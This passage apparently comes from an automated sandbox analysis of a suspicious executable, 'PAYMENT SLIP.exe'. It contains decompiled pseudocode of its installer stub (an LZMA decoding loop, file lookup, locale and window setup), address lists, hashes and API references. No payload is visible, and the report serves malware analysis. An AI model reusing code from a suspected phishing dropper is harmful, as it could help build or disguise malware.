              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t365 = __ebp - 0x70;
              							 *_t365 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t365;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							goto L111;
              						case 0x11:
              							L68:
              							__esi =  *(__ebp - 0x58);
              							 *(__ebp - 0x84) = 0x12;
              							goto L132;
              						case 0x12:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 0x58);
              								 *(__ebp - 0x84) = 0x13;
              								__esi =  *(__ebp - 0x58) + 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x4c);
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							__eflags = __eax;
              							__eax =  *(__ebp - 0x58) + __eax + 4;
              							goto L130;
              						case 0x13:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								_t469 = __ebp - 0x58;
              								 *_t469 =  *(__ebp - 0x58) + 0x204;
              								__eflags =  *_t469;
              								 *(__ebp - 0x30) = 0x10;
              								 *(__ebp - 0x40) = 8;
              								L144:
              								 *(__ebp - 0x7c) = 0x14;
              								goto L145;
              							}
              							__eax =  *(__ebp - 0x4c);
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							 *(__ebp - 0x30) = 8;
              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              							L130:
              							 *(__ebp - 0x58) = __eax;
              							 *(__ebp - 0x40) = 3;
              							goto L144;
              						case 0x14:
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              							__eax =  *(__ebp - 0x80);
              							goto L140;
              						case 0x15:
              							__eax = 0;
              							__eflags =  *(__ebp - 0x38) - 7;
              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              							__al = __al & 0x000000fd;
              							__eax = (__eflags >= 0) - 1 + 0xb;
              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              							goto L120;
              						case 0x16:
              							__eax =  *(__ebp - 0x30);
              							__eflags = __eax - 4;
              							if(__eax >= 4) {
              								_push(3);
              								_pop(__eax);
              							}
              							__ecx =  *(__ebp - 4);
              							 *(__ebp - 0x40) = 6;
              							__eax = __eax << 7;
              							 *(__ebp - 0x7c) = 0x19;
              							 *(__ebp - 0x58) = __eax;
              							goto L145;
              						case 0x17:
              							L145:
              							__eax =  *(__ebp - 0x40);
              							 *(__ebp - 0x50) = 1;
              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
              							goto L149;
              						case 0x18:
              							L146:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x18;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t484 = __ebp - 0x70;
              							 *_t484 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t484;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L148:
              							_t487 = __ebp - 0x48;
              							 *_t487 =  *(__ebp - 0x48) - 1;
              							__eflags =  *_t487;
              							L149:
              							__eflags =  *(__ebp - 0x48);
              							if( *(__ebp - 0x48) <= 0) {
              								__ecx =  *(__ebp - 0x40);
              								__ebx =  *(__ebp - 0x50);
              								0 = 1;
              								__eax = 1 << __cl;
              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
              								__eax =  *(__ebp - 0x7c);
              								 *(__ebp - 0x44) = __ebx;
              								goto L140;
              							}
              							__eax =  *(__ebp - 0x50);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              							__eax =  *(__ebp - 0x58);
              							__esi = __edx + __eax;
              							 *(__ebp - 0x54) = __esi;
              							__ax =  *__esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								__cx = __ax >> 5;
              								__eax = __eax - __ecx;
              								__edx = __edx + 1;
              								__eflags = __edx;
              								 *__esi = __ax;
              								 *(__ebp - 0x50) = __edx;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L148;
              							} else {
              								goto L146;
              							}
              						case 0x19:
              							__eflags = __ebx - 4;
              							if(__ebx < 4) {
              								 *(__ebp - 0x2c) = __ebx;
              								L119:
              								_t393 = __ebp - 0x2c;
              								 *_t393 =  *(__ebp - 0x2c) + 1;
              								__eflags =  *_t393;
              								L120:
              								__eax =  *(__ebp - 0x2c);
              								__eflags = __eax;
              								if(__eax == 0) {
              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              									goto L170;
              								}
              								__eflags = __eax -  *(__ebp - 0x60);
              								if(__eax >  *(__ebp - 0x60)) {
              									goto L171;
              								}
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              								__eax =  *(__ebp - 0x30);
              								_t400 = __ebp - 0x60;
              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              								__eflags =  *_t400;
              								goto L123;
              							}
              							__ecx = __ebx;
              							__eax = __ebx;
              							__ecx = __ebx >> 1;
              							__eax = __ebx & 0x00000001;
              							__ecx = (__ebx >> 1) - 1;
              							__al = __al | 0x00000002;
              							__eax = (__ebx & 0x00000001) << __cl;
              							__eflags = __ebx - 0xe;
              							 *(__ebp - 0x2c) = __eax;
              							if(__ebx >= 0xe) {
              								__ebx = 0;
              								 *(__ebp - 0x48) = __ecx;
              								L102:
              								__eflags =  *(__ebp - 0x48);
              								if( *(__ebp - 0x48) <= 0) {
              									__eax = __eax + __ebx;
              									 *(__ebp - 0x40) = 4;
              									 *(__ebp - 0x2c) = __eax;
              									__eax =  *(__ebp - 4);
              									__eax =  *(__ebp - 4) + 0x644;
              									__eflags = __eax;
              									L108:
              									__ebx = 0;
              									 *(__ebp - 0x58) = __eax;
              									 *(__ebp - 0x50) = 1;
              									 *(__ebp - 0x44) = 0;
              									 *(__ebp - 0x48) = 0;
              									L112:
              									__eax =  *(__ebp - 0x40);
              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              										_t391 = __ebp - 0x2c;
              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
              										__eflags =  *_t391;
              										goto L119;
              									}
              									__eax =  *(__ebp - 0x50);
              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              									__eax =  *(__ebp - 0x58);
              									__esi = __edi + __eax;
              									 *(__ebp - 0x54) = __esi;
              									__ax =  *__esi;
              									__ecx = __ax & 0x0000ffff;
              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              									__eflags =  *(__ebp - 0xc) - __edx;
              									if( *(__ebp - 0xc) >= __edx) {
              										__ecx = 0;
              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              										__ecx = 1;
              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              										__ebx = 1;
              										__ecx =  *(__ebp - 0x48);
              										__ebx = 1 << __cl;
              										__ecx = 1 << __cl;
              										__ebx =  *(__ebp - 0x44);
              										__ebx =  *(__ebp - 0x44) | __ecx;
              										__cx = __ax;
              										__cx = __ax >> 5;
              										__eax = __eax - __ecx;
              										__edi = __edi + 1;
              										__eflags = __edi;
              										 *(__ebp - 0x44) = __ebx;
              										 *__esi = __ax;
              										 *(__ebp - 0x50) = __edi;
              									} else {
              										 *(__ebp - 0x10) = __edx;
              										0x800 = 0x800 - __ecx;
              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              										 *__esi = __dx;
              									}
              									__eflags =  *(__ebp - 0x10) - 0x1000000;
              									if( *(__ebp - 0x10) >= 0x1000000) {
              										L111:
              										_t368 = __ebp - 0x48;
              										 *_t368 =  *(__ebp - 0x48) + 1;
              										__eflags =  *_t368;
              										goto L112;
              									} else {
              										goto L109;
              									}
              								}
              								__ecx =  *(__ebp - 0xc);
              								__ebx = __ebx + __ebx;
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              								 *(__ebp - 0x44) = __ebx;
              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              									__ecx =  *(__ebp - 0x10);
              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              									__ebx = __ebx | 0x00000001;
              									__eflags = __ebx;
              									 *(__ebp - 0x44) = __ebx;
              								}
              								__eflags =  *(__ebp - 0x10) - 0x1000000;
              								if( *(__ebp - 0x10) >= 0x1000000) {
              									L101:
              									_t338 = __ebp - 0x48;
              									 *_t338 =  *(__ebp - 0x48) - 1;
              									__eflags =  *_t338;
              									goto L102;
              								} else {
              									goto L99;
              								}
              							}
              							__edx =  *(__ebp - 4);
              							__eax = __eax - __ebx;
              							 *(__ebp - 0x40) = __ecx;
              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              							goto L108;
              						case 0x1a:
              							goto L55;
              						case 0x1b:
              							L75:
              							__eflags =  *(__ebp - 0x64);
              							if( *(__ebp - 0x64) == 0) {
              								 *(__ebp - 0x88) = 0x1b;
              								goto L170;
              							}
              							__eax =  *(__ebp - 0x14);
              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              							__eflags = __eax -  *(__ebp - 0x74);
              							if(__eax >=  *(__ebp - 0x74)) {
              								__eax = __eax +  *(__ebp - 0x74);
              								__eflags = __eax;
              							}
              							__edx =  *(__ebp - 8);
              							__cl =  *(__eax + __edx);
              							__eax =  *(__ebp - 0x14);
              							 *(__ebp - 0x5c) = __cl;
              							 *(__eax + __edx) = __cl;
              							__eax = __eax + 1;
              							__edx = 0;
              							_t274 = __eax %  *(__ebp - 0x74);
              							__eax = __eax /  *(__ebp - 0x74);
              							__edx = _t274;
              							__eax =  *(__ebp - 0x68);
              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              							_t283 = __ebp - 0x64;
              							 *_t283 =  *(__ebp - 0x64) - 1;
              							__eflags =  *_t283;
              							 *( *(__ebp - 0x68)) = __cl;
              							goto L79;
              						case 0x1c:
              							while(1) {
              								L123:
              								__eflags =  *(__ebp - 0x64);
              								if( *(__ebp - 0x64) == 0) {
              									break;
              								}
              								__eax =  *(__ebp - 0x14);
              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              								__eflags = __eax -  *(__ebp - 0x74);
              								if(__eax >=  *(__ebp - 0x74)) {
              									__eax = __eax +  *(__ebp - 0x74);
              									__eflags = __eax;
              								}
              								__edx =  *(__ebp - 8);
              								__cl =  *(__eax + __edx);
              								__eax =  *(__ebp - 0x14);
              								 *(__ebp - 0x5c) = __cl;
              								 *(__eax + __edx) = __cl;
              								__eax = __eax + 1;
              								__edx = 0;
              								_t414 = __eax %  *(__ebp - 0x74);
              								__eax = __eax /  *(__ebp - 0x74);
              								__edx = _t414;
              								__eax =  *(__ebp - 0x68);
              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              								__eflags =  *(__ebp - 0x30);
              								 *( *(__ebp - 0x68)) = __cl;
              								 *(__ebp - 0x14) = __edx;
              								if( *(__ebp - 0x30) > 0) {
              									continue;
              								} else {
              									goto L80;
              								}
              							}
              							 *(__ebp - 0x88) = 0x1c;
              							goto L170;
              					}
              				}
              			}













              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x00000000
              0x004072c4
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00000000
              0x00407437
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00000000
              0x0040728c
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
              • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040689A(WCHAR* _a4) {
              				void* _t2;
              
              				_t2 = FindFirstFileW(_a4, 0x426798); // executed
              				if(_t2 == 0xffffffff) {
              					return 0;
              				}
              				FindClose(_t2);
              				return 0x426798;
              			}





              APIs
              • FindFirstFileW.KERNELBASE(73BCFAA0,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 004068A5
              • FindClose.KERNEL32(00000000), ref: 004068B1
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
              • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
              • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E00403C0B(void* __eflags) {
              				intOrPtr _v4;
              				intOrPtr _v8;
              				int _v12;
              				void _v16;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t22;
              				void* _t30;
              				void* _t32;
              				int _t33;
              				void* _t36;
              				int _t39;
              				int _t40;
              				int _t44;
              				short _t63;
              				WCHAR* _t65;
              				signed char _t69;
              				signed short _t73;
              				WCHAR* _t76;
              				intOrPtr _t82;
              				WCHAR* _t87;
              
              				_t82 =  *0x42a274;
              				_t22 = E00406931(2);
              				_t90 = _t22;
              				if(_t22 == 0) {
              					_t76 = 0x423748;
              					L"1033" = 0x30;
              					 *0x437002 = 0x78;
              					 *0x437004 = 0;
              					E0040640A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
              					__eflags =  *0x423748;
              					if(__eflags == 0) {
              						E0040640A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
              					}
              					lstrcatW(L"1033", _t76);
              				} else {
              					_t73 =  *_t22(); // executed
              					E00406483(L"1033", _t73 & 0x0000ffff);
              				}
              				E00403EE1(_t78, _t90);
              				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
              				 *0x42a300 =  *0x42a27c & 0x00000020;
              				 *0x42a31c = 0x10000;
              				if(E00405F19(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
              					L16:
              					if(E00405F19(_t98, _t86) == 0) {
              						E00406579(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
              					}
              					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
              					 *0x429248 = _t30;
              					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
              						L21:
              						if(E0040140B(0) == 0) {
              							_t32 = E00403EE1(_t78, __eflags);
              							__eflags =  *0x42a320;
              							if( *0x42a320 != 0) {
              								_t33 = E00405677(_t32, 0);
              								__eflags = _t33;
              								if(_t33 == 0) {
              									E0040140B(1);
              									goto L33;
              								}
              								__eflags =  *0x42922c;
              								if( *0x42922c == 0) {
              									E0040140B(2);
              								}
              								goto L22;
              							}
              							ShowWindow( *0x423728, 5);
              							_t39 = E004068C1("RichEd20");
              							__eflags = _t39;
              							if(_t39 == 0) {
              								E004068C1("RichEd32");
              							}
              							_t87 = L"RichEdit20W";
              							_t40 = GetClassInfoW(0, _t87, 0x429200);
              							__eflags = _t40;
              							if(_t40 == 0) {
              								GetClassInfoW(0, L"RichEdit", 0x429200);
              								 *0x429224 = _t87;
              								RegisterClassW(0x429200);
              							}
              							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E00403FB9, 0);
              							E00403B5B(E0040140B(5), 1);
              							return _t44;
              						}
              						L22:
              						_t36 = 2;
              						return _t36;
              					} else {
              						_t78 =  *0x42a260;
              						 *0x429204 = E00401000;
              						 *0x429210 =  *0x42a260;
              						 *0x429214 = _t30;
              						 *0x429224 = 0x40a3b4;
              						if(RegisterClassW(0x429200) == 0) {
              							L33:
              							__eflags = 0;
              							return 0;
              						}
              						SystemParametersInfoW(0x30, 0,  &_v16, 0);
              						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
              						goto L21;
              					}
              				} else {
              					_t78 =  *(_t82 + 0x48);
              					_t92 = _t78;
              					if(_t78 == 0) {
              						goto L16;
              					}
              					_t76 = 0x428200;
              					E0040640A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a2b8 + _t78 * 2,  *0x42a2b8 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
              					_t63 =  *0x428200; // 0x4b
              					if(_t63 == 0) {
              						goto L16;
              					}
              					if(_t63 == 0x22) {
              						_t76 = 0x428202;
              						 *((short*)(E00405E3E(0x428202, 0x22))) = 0;
              					}
              					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
              					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
              						L15:
              						E0040653C(_t86, E00405E11(_t76));
              						goto L16;
              					} else {
              						_t69 = GetFileAttributesW(_t76);
              						if(_t69 == 0xffffffff) {
              							L14:
              							E00405E5D(_t76);
              							goto L15;
              						}
              						_t98 = _t69 & 0x00000010;
              						if((_t69 & 0x00000010) != 0) {
              							goto L15;
              						}
              						goto L14;
              					}
              				}
              			}


























              APIs
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000000), ref: 00403C25
                • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
              • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
              • lstrlenW.KERNEL32(KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,73BCFAA0), ref: 00403D0C
